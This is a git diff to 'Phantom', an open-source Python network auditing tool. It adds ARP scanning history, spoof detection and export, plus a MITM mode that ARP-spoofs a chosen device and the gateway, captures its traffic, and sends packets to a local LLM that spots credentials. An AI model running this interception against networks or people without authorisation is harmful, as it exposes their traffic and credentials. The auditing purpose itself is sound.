diff --git a/.pylintrc b/.pylintrc
index 3cd3421..70046fa 100644
--- a/.pylintrc
+++ b/.pylintrc
@@ -1,3 +1,13 @@
[MASTER]
init-hook='import sys; sys.path.append(".")'
-extension-pkg-allow-list=netifaces
\ No newline at end of file
+extension-pkg-allow-list=netifaces,scapy,setuptools
+
+[DESIGN]
+max-args=11
+max-positional-arguments=11
+max-attributes=15
+max-locals=18
+max-statements=80
+
+[MESSAGES CONTROL]
+disable=too-few-public-methods,import-outside-toplevel
\ No newline at end of file
diff --git a/README.md b/README.md
index ee3ca8f..7d4edf8 100644
--- a/README.md
+++ b/README.md
@@ -1,7 +1,5 @@
-
-
---
@@ -9,34 +7,38 @@
# Phantom
## Overview
-Phantom is an **ARP Scanner** mostly designed to detect directly connected IoT devices. The tool provides details like IP addresses, MAC addresses, hostnames, and the manufacturers of the devices based on their MAC addresses.
-The tool features a graphical user interface (GUI) built with **PySide6** (Qt framework) and utilizes **scapy** for ARP scanning.
----
+Phantom is a **network reconnaissance and security auditing tool** designed for directly connected networks. It discovers devices via ARP scanning, tracks their history, detects ARP spoofing attacks, and can perform MITM interception with live packet analysis powered by a local LLM.
+
+The GUI is built with **PySide6** (Qt framework) and uses **Scapy** for all packet-level operations.
-## Features
-- **Network Scanning**: Identifies devices on the network via ARP requests.
-- **Device Details**: Displays IP address, MAC address, hostname, and vendor information.
-- **Graphical User Interface**: Easy-to-use UI to display the scanned devices and packet information.
-- **Multithreading**: Ensures non-blocking scans using Python's `QThread`.
-- **C extension**: for MacOSX there is a C extension that allows slow sequential but very accurate arp scanning
---
-## Prerequisites
+## Features
-Ensure the following dependencies are installed:
+- **ARP Network Scanning**: Discovers devices via ARP requests, displaying IP, MAC, hostname, and vendor.
+- **Device History & Persistence**: Stores scan results in a local SQLite database; previously seen devices are shown on startup.
+- **New Device & MAC Change Detection**: Highlights new devices (green) and IP-to-MAC binding changes (red) — a classic ARP spoofing indicator.
+- **ARP Spoof Detection**: Passive background sniffer that alerts on conflicting ARP bindings and gateway MAC changes.
+- **MITM Interception**: ARP-spoof a target to intercept its traffic; captured packets are displayed in real time with a full layer-by-layer breakdown.
+- **LLM Packet Analysis**: Send any captured packet to a local [Ollama](https://ollama.com) instance for AI-assisted analysis (protocol identification, risk assessment, credential spotting).
+- **PCAP Export**: Save captured packets from a MITM session as a `.pcap` file for offline analysis in Wireshark.
+- **Scan Export**: Export scan results to JSON or CSV.
+- **Progress Bar**: Live progress feedback during scanning.
+- **Custom CIDR Target**: Scan a specific subnet instead of the local interface network.
+- **Multithreading**: All network operations run in `QThread` workers — the UI stays responsive throughout.
+- **C Extension (macOS)**: A native C extension provides accurate, sequential ARP scanning on macOS where Scapy bulk-send is unreliable.
-1. **Python 3.12 or higher**
-2. **scapy**: Used for ARP scanning.
-3. **PySide6**: For building the GUI.
-4. **netifaces**: To retrieve network interface details.
+---
## Requirements
- **Python 3.12+**
-- **scapy**: For ARP scanning and packet manipulation.
-- **PySide6**: For building the graphical user interface.
-- **netifaces**: To retrieve network interface details.
+- **scapy** — ARP scanning and packet manipulation
+- **PySide6** — graphical user interface
+- **netifaces** — network interface introspection
+- **requests** — Ollama API streaming
+- **Ollama** (optional) — local LLM for packet analysis (`ollama serve`)
---
@@ -44,16 +46,12 @@ Ensure the following dependencies are installed:
1. **Clone the repository**:
- Clone the repository to your local machine:
-
```bash
git clone https://github.com/CyberRoute/phantom.git
cd phantom
```
-2. **Install the dependencies with Pipenv**:
-
- Install `pip` if it's not already installed:
+2. **Create a virtual environment and install dependencies**:
```bash
virtualenv env
@@ -61,57 +59,111 @@ Ensure the following dependencies are installed:
pip install -r requirements.txt
```
-3. **Run the application**:
-
- Run the ARP Scanner using the following command. You need to provide the network interface (like `eth0`, `wlan0`, or `wlp0s20f3`) for your system:
+3. **(macOS only) Build the native C extension**:
```bash
- sudo `which python3` main.py --interface --timeout 500
- ```
-
- On Ubuntu in case you run into this error:
- ```
- (env) alessandro@alessandro-XPS-9315:~/Development/phantom$ sudo /home/alessandro/Development/phantom/env/bin/python3 main.py --interface wlp0s20f3
- qt.qpa.plugin: From 6.5.0, xcb-cursor0 or libxcb-cursor0 is needed to load the Qt xcb platform plugin.
- qt.qpa.plugin: Could not load the Qt platform plugin "xcb" in "" even though it was found.
- This application failed to start because no Qt platform plugin could be initialized. Reinstalling the application may fix this problem.
- Available platform plugins are: eglfs, minimal, wayland, vkkhrdisplay, offscreen, linuxfb, xcb, wayland-egl, minimalegl, vnc.
- ```
- Solution:
- ```
- sudo apt install libxcb-cursor0
- ```
- On Macos there is a C extension that allows accurate but slow arpscan. To build and install the extension:
- ```
pip install setuptools
cd c_extension
python setup.py build
python setup.py install
+ cd ..
```
-## Usage Instructions
+4. **Run the application** (root/sudo is required for raw packet operations):
-1. **Start the Application**:
+ ```bash
+ sudo `which python3` main.py --interface --timeout 500
+ ```
+
+ Optional arguments:
- After running the application with the correct interface, the GUI will launch.
+ | Argument | Default | Description |
+ |---|---|---|
+ | `--interface` | *(required)* | Network interface name (e.g. `eth0`, `wlan0`) |
+ | `--timeout` | `1000` | ARP scan timeout in milliseconds |
+ | `--target` | interface network | Custom CIDR range to scan (e.g. `10.0.0.0/24`) |
-
-

-
+### Troubleshooting (Ubuntu / xcb plugin error)
-2. **Scanning the Network**:
+```
+qt.qpa.plugin: Could not load the Qt platform plugin "xcb"
+```
- - Click on the **"Scan"** button in the UI to initiate a network scan.
- - The tool will display a list of all detected devices in the network, including their IP addresses, MAC addresses, hostnames, and vendors.
+Fix:
-3. **Device Details**:
+```bash
+sudo apt install libxcb-cursor0
+```
+
+---
- - Click on any device in the list to open a detailed window that shows more information about that particular device.
+## Usage
-4. **Stopping the Scan**:
+### 1. Scan the network
- - Press the **"Quit"** button to stop the ARP scan and close the application.
+Click **Scan** to start an ARP sweep of the local network (or a custom CIDR if `--target` was specified). Devices appear as they respond:
+
+- **White** — previously seen device, confirmed live
+- **Green** — new device (first time seen)
+- **Red** — IP address answered with a different MAC than before (possible ARP spoofing)
+- **Grey** — device from the database not yet confirmed live in this scan
+
+A progress bar tracks scan completion. Results can be exported to JSON or CSV with **Export Results**.
+
+### 2. Inspect a device
+
+Click any device in the list to open its detail window, which shows:
+
+- IP, MAC, hostname, vendor
+- First seen / last seen timestamps
+- Full MAC address history (useful for spoofing audits)
+- MITM controls
+
+### 3. MITM interception
+
+From the device detail window, click **Start MITM** to:
+
+1. ARP-spoof the target and the gateway (Phantom inserts itself in the traffic path).
+2. Enable IP forwarding so the target's internet access is preserved.
+3. Capture all non-ARP traffic to/from the target in real time.
+
+Click any captured packet to see a full hex dump and layer-by-layer field breakdown.
+Click **Save PCAP** to write the captured session to a `.pcap` file.
+
+> **Note:** MITM requires root/sudo. IP forwarding is restored automatically when MITM is stopped.
+
+### 4. LLM packet analysis (Ollama)
+
+With [Ollama](https://ollama.com) running locally (`ollama serve`) and a model pulled (default: `deepseek-r1:1.5b`):
+
+1. Select a captured packet in the MITM window.
+2. Optionally add context in the **Context** field (e.g. `"this is a smart TV"`).
+3. Click **Analyse with LLM** — the analysis streams in token by token.
+
+The LLM identifies protocol/service, describes what the endpoints are doing, flags security-relevant observations, and provides a risk rating.
+
+---
+
+## Architecture
+
+```
+main.py — entry point, CLI args, QApplication bootstrap
+core/
+ arp_scanner.py — ARPScannerThread, DeviceDiscoveryDialog, DeviceDetailsWindow
+ arp_spoofer.py — low-level ARP spoof / restore primitives
+ mitm.py — MitmThread (spoof loop + sniffer), IP forwarding management
+ spoof_detector.py — passive ARP sniff-based spoof detection
+ ollama_analyst.py — OllamaThread for streaming LLM packet analysis
+ db.py — SQLite persistence (device history, MAC audit trail)
+ networking.py — CIDR calculation, hostname resolution helpers
+ vendor.py — OUI/MAC vendor lookup
+ platform.py — OS detection helper
+c_extension/ — native C ARP scanner for macOS
+ui/ — PySide6 .ui compiled files
+```
+
+---
## Contribute
-Fork the repo and send PRs if you like :)
+Fork the repo and send PRs if you like :)
diff --git a/c_extension/setup.py b/c_extension/setup.py
index 632d2e0..293abfb 100644
--- a/c_extension/setup.py
+++ b/c_extension/setup.py
@@ -1,6 +1,8 @@
-from setuptools import setup, Extension
-import sysconfig
+"""Build configuration for the native arpscanner C extension."""
import os
+import sysconfig
+
+from setuptools import setup, Extension # pylint: disable=import-error
# For macOS, we need to explicitly include libpcap
extra_compile_args = []
@@ -20,4 +22,4 @@
name='ArpScanner',
version='1.0',
ext_modules=[module]
-)
\ No newline at end of file
+)
diff --git a/core/arp_scanner.py b/core/arp_scanner.py
index a1ac7a9..dc17400 100644
--- a/core/arp_scanner.py
+++ b/core/arp_scanner.py
@@ -1,46 +1,66 @@
"""
Module Arp Scanner
"""
+
+import concurrent.futures
+import csv
import ipaddress
+import json
+from datetime import datetime
+
import netifaces
-from scapy.all import ARP, get_if_addr, srp, Ether# pylint: disable=E0611
-from PySide6.QtWidgets import ( # pylint: disable=E0611
- QMainWindow,
- QVBoxLayout,
- QLabel,
- QWidget,
- QDialog,
- QListWidgetItem,
- QProgressBar
-)
-from PySide6.QtGui import QIcon, QFont, QColor # pylint: disable=E0611
-from PySide6.QtCore import Slot, Qt, QTimer # pylint: disable=E0611
-from PySide6.QtCore import QThread, Signal # pylint: disable=E0611
-from ui.ui_arpscan import Ui_DeviceDiscovery
+from PySide6.QtCore import Qt, QThread, Signal, Slot # pylint: disable=E0611
+from PySide6.QtGui import QColor, QFont, QIcon # pylint: disable=E0611
+from PySide6.QtWidgets import (QDialog, QFileDialog, # pylint: disable=E0611
+ QLabel, QLineEdit, QListWidget, QListWidgetItem,
+ QMainWindow, QMessageBox, QProgressBar,
+ QPushButton, QSplitter, QTextEdit, QVBoxLayout,
+ QWidget)
+from scapy.all import ARP, Ether, get_if_addr, srp # pylint: disable=E0611
+
+from core import db
+import core.networking as net
from core import vendor
+from core.mitm import MitmThread
+from core.ollama_analyst import OllamaThread
from core.platform import get_os
-import core.networking as net
+from ui.ui_arpscan import Ui_DeviceDiscovery
try:
import arpscanner
+
NATIVE_ARP_AVAILABLE = True
except ImportError:
NATIVE_ARP_AVAILABLE = False
-
-class DeviceDetailsWindow(QMainWindow): # pylint: disable=too-few-public-methods
- """
- A window that displays detailed information about a network device.
-
- Attributes:
- ip_address (str): The IP address of the device.
- mac_address (str): The MAC address of the device.
- hostname (str): The hostname of the device.
- vendor (str): The vendor of the device.
- """
- def __init__(self, ip_address, mac_address, hostname, device_vendor):
+# Parallelism: number of workers for concurrent host resolution
+_RESOLVE_WORKERS = 20
+
+
+class DeviceDetailsWindow(QMainWindow): # pylint: disable=too-many-instance-attributes
+ """Window showing detailed information about a device, with MITM controls."""
+
+ def __init__( # pylint: disable=too-many-arguments,too-many-positional-arguments
+ self,
+ ip_address,
+ mac_address,
+ hostname,
+ device_vendor,
+ interface,
+ gateway_ip,
+ status="seen",
+ first_seen=None,
+ last_seen=None,
+ mac_history=None,
+ ):
super().__init__()
- self.setWindowTitle("Device Details")
+ self.setWindowTitle(f"Device — {ip_address}")
+ self.ip_address = ip_address
+ self.interface = interface
+ self.gateway_ip = gateway_ip
+ self._device_vendor = device_vendor
+ self._hostname = hostname
+ self._mitm: MitmThread | None = None
layout = QVBoxLayout()
layout.addWidget(QLabel(f"IP Address: {ip_address}"))
@@ -48,89 +68,310 @@ def __init__(self, ip_address, mac_address, hostname, device_vendor):
layout.addWidget(QLabel(f"Hostname: {hostname}"))
layout.addWidget(QLabel(f"Vendor: {device_vendor}"))
+ if status == "new":
+ lbl = QLabel(" NEW DEVICE — first time seen")
+ lbl.setStyleSheet("color: #00ff00; font-weight: bold")
+ layout.addWidget(lbl)
+ elif status == "mac_changed":
+ lbl = QLabel(" MAC ADDRESS CHANGED — possible ARP spoofing!")
+ lbl.setStyleSheet("color: #ff4444; font-weight: bold")
+ layout.addWidget(lbl)
+
+ if first_seen:
+ layout.addWidget(QLabel(f"First seen: {first_seen}"))
+ if last_seen:
+ layout.addWidget(QLabel(f"Last seen: {last_seen}"))
+
+ if mac_history and len(mac_history) > 1:
+ layout.addWidget(QLabel("MAC History:"))
+ for entry in mac_history:
+ layout.addWidget(
+ QLabel(f" {entry['seen_at']} {entry['mac_address']}")
+ )
+
+ # MITM controls
+ self._status_label = QLabel("MITM: idle")
+ self._status_label.setStyleSheet("color: grey")
+ layout.addWidget(self._status_label)
+
+ self._mitm_button = QPushButton("Start MITM")
+ self._mitm_button.setCheckable(True)
+ self._mitm_button.clicked.connect(self._toggle_mitm)
+ layout.addWidget(self._mitm_button)
+
+ self._save_pcap_button = QPushButton("Save PCAP")
+ self._save_pcap_button.clicked.connect(self._save_pcap)
+ self._save_pcap_button.setEnabled(False)
+ layout.addWidget(self._save_pcap_button)
+
+ mono = QFont("Monospace")
+ mono.setPointSize(9)
+
+ self._packet_list = QListWidget()
+ self._packet_list.setFont(mono)
+ self._packet_list.currentRowChanged.connect(self._on_packet_selected)
+
+ self._packet_detail = QTextEdit()
+ self._packet_detail.setReadOnly(True)
+ self._packet_detail.setFont(mono)
+ self._packet_detail.setStyleSheet("background:black; color:white;")
+ self._packet_detail.setPlaceholderText("Select a packet to inspect it...")
+
+ # Analyse button + LLM output
+ self._analyse_button = QPushButton("Analyse with LLM")
+ self._analyse_button.setEnabled(False)
+ self._analyse_button.clicked.connect(self._analyse_packet)
+
+ self._llm_output = QTextEdit()
+ self._llm_output.setReadOnly(True)
+ self._llm_output.setFont(mono)
+ self._llm_output.setStyleSheet("background:black; color:white;")
+ self._llm_output.setPlaceholderText("LLM analysis will appear here...")
+ self._llm_output.setMaximumHeight(180)
+
+ # Stack: packet list | packet detail | [analyse btn + llm output]
+ pkt_splitter = QSplitter(Qt.Vertical)
+ pkt_splitter.addWidget(self._packet_list)
+ pkt_splitter.addWidget(self._packet_detail)
+ pkt_splitter.setSizes([180, 180])
+
+ self._user_context = QLineEdit()
+ self._user_context.setPlaceholderText(
+ "Optional context for the LLM (e.g. 'this is a smart TV', 'focus on credentials')..."
+ )
+ self._user_context.returnPressed.connect(self._analyse_packet)
+
+ layout.addWidget(QLabel("Captured packets:"))
+ layout.addWidget(pkt_splitter)
+ layout.addWidget(QLabel("Context:"))
+ layout.addWidget(self._user_context)
+ layout.addWidget(self._analyse_button)
+ layout.addWidget(QLabel("LLM analysis:"))
+ layout.addWidget(self._llm_output)
+
+ self._captured_packets = [] # newest first, mirrors list order
+ self._ollama_thread: OllamaThread | None = None
+
central_widget = QWidget()
central_widget.setLayout(layout)
self.setCentralWidget(central_widget)
+ self.resize(680, 850)
+
+ @Slot(bool)
+ def _toggle_mitm(self, checked):
+ if checked:
+ self._mitm = MitmThread(self.interface, self.ip_address, self.gateway_ip)
+ self._mitm.statusChanged.connect(self._on_status)
+ self._mitm.packetCaptured.connect(self._on_packet)
+ self._mitm.stopped.connect(self._on_mitm_stopped)
+ self._mitm.start()
+ self._mitm_button.setText("Stop MITM")
+ self._status_label.setStyleSheet("color: #ff8800; font-weight: bold")
+ else:
+ self._mitm_button.setEnabled(False)
+ if self._mitm:
+ self._mitm.stop() # async — _on_mitm_stopped will reset UI
+ @Slot()
+ def _on_mitm_stopped(self):
+ self._mitm = None
+ self._mitm_button.setText("Start MITM")
+ self._mitm_button.setChecked(False)
+ self._mitm_button.setEnabled(True)
+ self._status_label.setStyleSheet("color: grey")
+
+ @Slot(str)
+ def _on_status(self, msg):
+ self._status_label.setText(f"MITM: {msg}")
+ print(f"[MITM] {msg}")
+
+ @Slot(object)
+ def _on_packet(self, pkt):
+ self._captured_packets.insert(0, pkt) # newest first — mirrors list row index
+ self._save_pcap_button.setEnabled(True)
+ item = QListWidgetItem(pkt.summary())
+ item.setForeground(QColor(Qt.white))
+ item.setBackground(QColor(Qt.black))
+ self._packet_list.insertItem(0, item)
+ if self._packet_list.count() > 500:
+ self._packet_list.takeItem(self._packet_list.count() - 1)
+ self._captured_packets = self._captured_packets[:500]
-class DeviceDiscoveryDialog(QDialog): # pylint: disable=too-many-instance-attributes
+ @Slot(int)
+ def _on_packet_selected(self, row):
+ if row < 0 or row >= len(self._captured_packets):
+ return
+ pkt = self._captured_packets[row]
+ self._packet_detail.setPlainText(_format_packet(pkt))
+ self._analyse_button.setEnabled(True)
+ self._llm_output.clear()
+
+ @Slot()
+ def _analyse_packet(self):
+ row = self._packet_list.currentRow()
+ if row < 0 or row >= len(self._captured_packets):
+ return
+
+ # Cancel any running analysis
+ if self._ollama_thread and self._ollama_thread.isRunning():
+ self._ollama_thread.terminate()
+
+ pkt_text = _format_packet(self._captured_packets[row])
+ user_context = self._user_context.text().strip()
+ self._ollama_thread = OllamaThread(
+ pkt_text,
+ user_context=user_context,
+ device_vendor=self._device_vendor,
+ hostname=self._hostname,
+ )
+ self._ollama_thread.token.connect(self._on_llm_token)
+ self._ollama_thread.error.connect(self._on_llm_error)
+ self._ollama_thread.finished.connect(self._on_llm_finished)
+ self._ollama_thread.start()
+
+ self._analyse_button.setEnabled(False)
+ self._llm_output.setPlainText("Analysing...")
+
+ @Slot(str)
+ def _on_llm_token(self, token):
+ cursor = self._llm_output.textCursor()
+ cursor.movePosition(cursor.MoveOperation.End)
+ # Clear placeholder on first real token
+ if self._llm_output.toPlainText() == "Analysing...":
+ self._llm_output.clear()
+ cursor.insertText(token)
+ self._llm_output.setTextCursor(cursor)
+ self._llm_output.ensureCursorVisible()
+
+ @Slot(str)
+ def _on_llm_error(self, msg):
+ self._llm_output.setPlainText(f"Error: {msg}")
+
+ @Slot()
+ def _on_llm_finished(self):
+ self._analyse_button.setEnabled(True)
+
+ @Slot()
+ def _save_pcap(self):
+ if not self._captured_packets:
+ return
+ from scapy.all import wrpcap # pylint: disable=E0611
+
+ path, _ = QFileDialog.getSaveFileName(
+ self,
+ "Save PCAP",
+ f"mitm_{self.ip_address}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.pcap",
+ "PCAP Files (*.pcap)",
+ )
+ if path:
+ wrpcap(path, self._captured_packets)
+ print(f"[MITM] Saved {len(self._captured_packets)} packets to {path}")
+
+ def closeEvent(self, event): # pylint: disable=invalid-name
+ """Stop MITM thread when window closes."""
+ if self._mitm and self._mitm.isRunning():
+ self._mitm.stop()
+ # Don't wait — let the thread finish in the background and clean up
+ super().closeEvent(event)
+
+
+class DeviceDiscoveryDialog(QDialog): # pylint: disable=too-many-instance-attributes
"""Device Discovery"""
- def __init__(self, interface, oui_url, timeout=1000, parent=None):
+
+ def __init__(self, interface, oui_url, timeout=1000, target_cidr=None, parent=None):
super().__init__(parent)
self.interface = interface
self.mac_vendor_lookup = vendor.MacVendorLookup(oui_url)
self.timeout = timeout
+ self.target_cidr = target_cidr # None means use interface network
self._ui = Ui_DeviceDiscovery()
self._ui.setupUi(self)
- # Initialize the UI and connection setup
+ db.init_db()
+
+ # In-memory results for export and spoof seeding
+ self._last_results: list = []
+ # status tag per IP: 'new' | 'mac_changed' | 'seen'
+ self._device_status: dict[str, str] = {}
+
self.setup_ui_elements()
- # Add a progress bar to the UI
self.progress_bar = QProgressBar(self)
self.progress_bar.setRange(0, 100)
self.progress_bar.setValue(0)
- # Add it to the vertical layout (or any layout of your choice)
self._ui.verticalLayout.addWidget(self.progress_bar)
- # Initialize scanner and device info storage
+ # Export button
+ self.export_button = QPushButton("Export Results", self)
+ self.export_button.clicked.connect(self.export_results)
+ self._ui.verticalLayout.addWidget(self.export_button)
+
self.scanner_timer = None
- self.device_info = {} # Store dynamic device info here
+ self.device_info = {}
self.arp_scanner_thread = None
+ self.device_details_window = None
+
+ self._load_known_devices()
+
+ # ------------------------------------------------------------------
+ # Known devices from DB
+ # ------------------------------------------------------------------
+
+ def _load_known_devices(self):
+ """Populate the list with previously seen devices from the DB (shown as stale)."""
+ for d in db.get_all_devices():
+ self._add_stale_device(
+ d["ip_address"], d["mac_address"], d["hostname"], d["vendor"]
+ )
+
+ def _add_stale_device(self, ip, mac, hostname, vendor_name):
+ label = f"{ip} {mac} {hostname}, {vendor_name}"
+ if self._ui.devices.findItems(label, Qt.MatchExactly):
+ return
+ item = QListWidgetItem(label)
+ item.setBackground(QColor("#1a1a1a"))
+ item.setForeground(QColor("#666666")) # grey = cached, not yet confirmed live
+ self._ui.devices.addItem(item)
+
+ # ------------------------------------------------------------------
+ # UI setup
+ # ------------------------------------------------------------------
def setup_ui_elements(self):
"""Sets up the UI elements and connections."""
self.setWindowIcon(QIcon("images/phantom_logo.png"))
-
self._ui.scan.clicked.connect(self.start_scan)
- #net.enable_ip_forwarding()
self._ui.quit.clicked.connect(self.quit_application)
-
- # Add static labels and list widgets
self.add_static_ui_labels()
-
- # Connect item click signal to open_device_details
self._ui.devices.itemClicked.connect(self.open_device_details)
-
- # Set the default font for the list items
self.setup_font_for_list_widgets()
-
- self.resize(800, 600)
+ self.resize(900, 650)
def add_static_ui_labels(self):
"""Adds static labels like interface and OS information."""
- interface_label = QLabel(f"Interface: {self.interface}")
- interface_label.setStyleSheet("color: black")
-
- os_label = QLabel(f"OS: {get_os()}")
- os_label.setStyleSheet("color: black")
-
- # Adding additional network info
local_ip_address = get_if_addr(self.interface)
- local_ip_label = QLabel(f"Local IP Address: {local_ip_address}")
- local_ip_label.setStyleSheet("color: black")
-
- # Corrected variable name to get the default gateway correctly
default_gateway = netifaces.gateways()[2][0][0]
- default_gateway_label = QLabel(f"Default Gateway: {default_gateway}")
- default_gateway_label.setStyleSheet("color: black")
-
- local_mac_address = netifaces.ifaddresses(self.interface)[netifaces.AF_LINK][0]['addr']
- local_mac_label = QLabel(f"Local MAC Address: {local_mac_address}")
- local_mac_label.setStyleSheet("color: black")
-
- # Add labels to the vertical layout
- self._ui.verticalLayout.addWidget(os_label)
- self._ui.verticalLayout.addWidget(interface_label)
- self._ui.verticalLayout.addWidget(local_ip_label)
- self._ui.verticalLayout.addWidget(default_gateway_label)
- self._ui.verticalLayout.addWidget(local_mac_label)
-
- # Add timeout information
- timeout_label = QLabel(f"Scan Timeout: {self.timeout}ms")
- timeout_label.setStyleSheet("color: black")
- self._ui.verticalLayout.addWidget(timeout_label)
+ local_mac_address = netifaces.ifaddresses(self.interface)[netifaces.AF_LINK][0][
+ "addr"
+ ]
+
+ for text in [
+ f"OS: {get_os()}",
+ f"Interface: {self.interface}",
+ f"Local IP Address: {local_ip_address}",
+ f"Default Gateway: {default_gateway}",
+ f"Local MAC Address: {local_mac_address}",
+ f"Scan Timeout: {self.timeout}ms",
+ ]:
+ lbl = QLabel(text)
+ lbl.setStyleSheet("color: black")
+ self._ui.verticalLayout.addWidget(lbl)
+
+ if self.target_cidr:
+ lbl = QLabel(f"Target CIDR: {self.target_cidr}")
+ lbl.setStyleSheet("color: #0044cc; font-weight: bold")
+ self._ui.verticalLayout.addWidget(lbl)
def setup_font_for_list_widgets(self):
"""Sets up a uniform font for list widgets."""
@@ -139,221 +380,420 @@ def setup_font_for_list_widgets(self):
self._ui.devices.setFont(font)
self._ui.responses.setFont(font)
- @Slot(int)
- def update_progress(self, progress):
- """Update progress"""
- self.progress_bar.setValue(progress)
-
- @Slot(QListWidgetItem)
- def open_device_details(self, item):
- """Click on a device opens another window with details."""
- self.device_info = self.parse_device_details(item.text())
- if self.device_info:
- self.show_device_details_window()
- else:
- print("Invalid format: Not enough information")
-
- def parse_device_details(self, text):
- """Parses device details from the selected list item text."""
- parts = text.split()
- if len(parts) >= 4:
- return {
- "ip_address": parts[0],
- "mac": parts[1],
- "hostname": parts[2],
- "vendor": " ".join(parts[3:])
- }
- return None
-
- def show_device_details_window(self):
- """Opens a window showing detailed device information."""
- self.device_details_window = DeviceDetailsWindow( # pylint: disable=attribute-defined-outside-init
- self.device_info['ip_address'],
- self.device_info['mac'],
- self.device_info['hostname'],
- self.device_info['vendor']
- )
- self.device_details_window.show()
-
- @Slot()
- def toggle_scan(self):
- """Toggle scanning all local networks every 1s."""
- self._ui.scan.setEnabled(False)
- self.scanner_timer = self.setup_scanner_timer()
- self.scanner_timer.start()
-
- def setup_scanner_timer(self):
- """Sets up the scanner timer to periodically trigger ARP scanning."""
- timer_arp = QTimer(self)
- timer_arp.setInterval(1000)
- timer_arp.timeout.connect(self.start_scan)
- return timer_arp
+ # ------------------------------------------------------------------
+ # Scan
+ # ------------------------------------------------------------------
@Slot()
def start_scan(self):
"""Starts scanning the network."""
- # Check if there's already a running scan, and don't start another one
if self.arp_scanner_thread is not None and self.arp_scanner_thread.isRunning():
- print("Scan is already in progress.")
+ print("Scan already in progress.")
return
- # Create and start a new ARP scan thread
+ # Grey out existing entries — they'll be re-lit if confirmed live
+ for i in range(self._ui.devices.count()):
+ item = self._ui.devices.item(i)
+ item.setBackground(QColor("#1a1a1a"))
+ item.setForeground(QColor("#666666"))
+ self._ui.responses.clear()
+ self._last_results = []
+ self._device_status = {}
+ self.progress_bar.setValue(0)
+
self.arp_scanner_thread = ARPScannerThread(
self.interface,
self.mac_vendor_lookup,
- self.timeout/1000
- )
+ self.timeout / 1000,
+ target_cidr=self.target_cidr,
+ )
self.arp_scanner_thread.partialResults.connect(self.handle_partial_results)
self.arp_scanner_thread.finished.connect(self.handle_scan_results)
- self.arp_scanner_thread.progressChanged.connect(self.update_progress) # New connection
+ self.arp_scanner_thread.progressChanged.connect(self.update_progress)
self.arp_scanner_thread.start()
- print(f"Started ARP scan with timeout: {self.timeout}ms")
+ target = self.target_cidr or 'local network'
+ print(f"Started ARP scan — timeout: {self.timeout}ms, target: {target}")
+
+ @Slot(int)
+ def update_progress(self, progress):
+ """Update the progress bar value."""
+ self.progress_bar.setValue(progress)
@Slot(list)
def handle_partial_results(self, partial_results):
- """Update partials"""
- for ip_address, mac, hostname, device_vendor, packet in partial_results: # pylint: disable=unused-variable
- self.add_device_to_list(ip_address, mac, hostname, device_vendor)
+ """Handle partial scan results as they arrive."""
+ for ip_address, mac, hostname, device_vendor, _ in partial_results:
+ status = self._upsert_and_tag(ip_address, mac, hostname, device_vendor)
+ self.add_device_to_list(ip_address, mac, hostname, device_vendor, status)
@Slot(list)
def handle_scan_results(self, results):
- """Updates the scan results."""
+ """Handle the final list of scan results."""
+ self._last_results = results
for ip_address, mac, hostname, device_vendor, packet in results:
- # Add device to the list if not already present
- self.add_device_to_list(ip_address, mac, hostname, device_vendor)
+ status = self._upsert_and_tag(ip_address, mac, hostname, device_vendor)
+ self.add_device_to_list(ip_address, mac, hostname, device_vendor, status)
+ self.add_packet_if_new(str(packet))
+
+ def _upsert_and_tag(self, ip, mac, hostname, device_vendor) -> str:
+ """Persist to DB, cache and return the status tag."""
+ if ip not in self._device_status:
+ status = db.upsert_device(ip, mac, hostname, device_vendor)
+ self._device_status[ip] = status
+ return self._device_status[ip]
+
+ def add_device_to_list(
+ self, ip_address, mac, hostname, device_vendor, status="seen"
+ ):
+ """Add or update a device entry with live colour coding."""
+ label = f"{ip_address} {mac} {hostname}, {device_vendor}"
- # Add packet to the packet list if not already present
- packet_label = str(packet)
- self.add_packet_if_new(packet_label)
+ # Find any existing row for this IP (label may differ if mac/hostname changed)
+ existing = None
+ for i in range(self._ui.devices.count()):
+ if self._ui.devices.item(i).text().startswith(ip_address + " "):
+ existing = self._ui.devices.item(i)
+ break
- def add_device_to_list(self, ip_address, mac, hostname, device_vendor):
- """Adds a device to the list widget in the UI."""
- label = f"{ip_address} {mac} {hostname}, {device_vendor}"
- if not self._ui.devices.findItems(label, Qt.MatchExactly):
+ if existing:
+ existing.setText(label)
+ item = existing
+ else:
item = QListWidgetItem(label)
+ self._ui.devices.addItem(item)
+
+ if status == "new":
+ item.setBackground(QColor("#003300"))
+ item.setForeground(QColor("#00ff00"))
+ elif status == "mac_changed":
+ item.setBackground(QColor("#330000"))
+ item.setForeground(QColor("#ff4444"))
+ else:
item.setBackground(QColor(Qt.black))
item.setForeground(QColor(Qt.white))
- self._ui.devices.addItem(item)
def add_packet_if_new(self, packet_label):
- """Adds a packet to the listpkt widget if it doesn't already exist."""
- existing_items = self._ui.responses.findItems(packet_label, Qt.MatchExactly)
- if not existing_items: # Add only if the packet is not already listed
- packet_item = QListWidgetItem(packet_label)
- packet_item.setBackground(QColor(Qt.black))
- packet_item.setForeground(QColor(Qt.white))
- self._ui.responses.addItem(packet_item)
+ """Add a packet summary to the responses list if not already present."""
+ if not self._ui.responses.findItems(packet_label, Qt.MatchExactly):
+ item = QListWidgetItem(packet_label)
+ item.setBackground(QColor(Qt.black))
+ item.setForeground(QColor(Qt.white))
+ self._ui.responses.addItem(item)
+
+ # ------------------------------------------------------------------
+ # Device detail click
+ # ------------------------------------------------------------------
+
+ @Slot(QListWidgetItem)
+ def open_device_details(self, item):
+ """Open the DeviceDetailsWindow for the clicked list item."""
+ self.device_info = self._parse_device_details(item.text())
+ if self.device_info:
+ ip = self.device_info["ip_address"]
+ status = self._device_status.get(ip, "seen")
+ history = db.get_mac_history(ip)
+ known = next((d for d in db.get_all_devices() if d["ip_address"] == ip), {})
+ gateway_ip = netifaces.gateways()["default"][netifaces.AF_INET][0]
+ self.device_details_window = (
+ DeviceDetailsWindow(
+ ip,
+ self.device_info["mac"],
+ self.device_info["hostname"],
+ self.device_info["vendor"],
+ interface=self.interface,
+ gateway_ip=gateway_ip,
+ status=status,
+ first_seen=known.get("first_seen"),
+ last_seen=known.get("last_seen"),
+ mac_history=history,
+ )
+ )
+ self.device_details_window.show()
+
+ @staticmethod
+ def _parse_device_details(text):
+ parts = text.split()
+ if len(parts) >= 4:
+ return {
+ "ip_address": parts[0],
+ "mac": parts[1],
+ "hostname": parts[2],
+ "vendor": " ".join(parts[3:]),
+ }
+ return None
+
+ # ------------------------------------------------------------------
+ # Export
+ # ------------------------------------------------------------------
+
+ @Slot()
+ def export_results(self):
+ """Export last scan results to JSON or CSV."""
+ if not self._last_results:
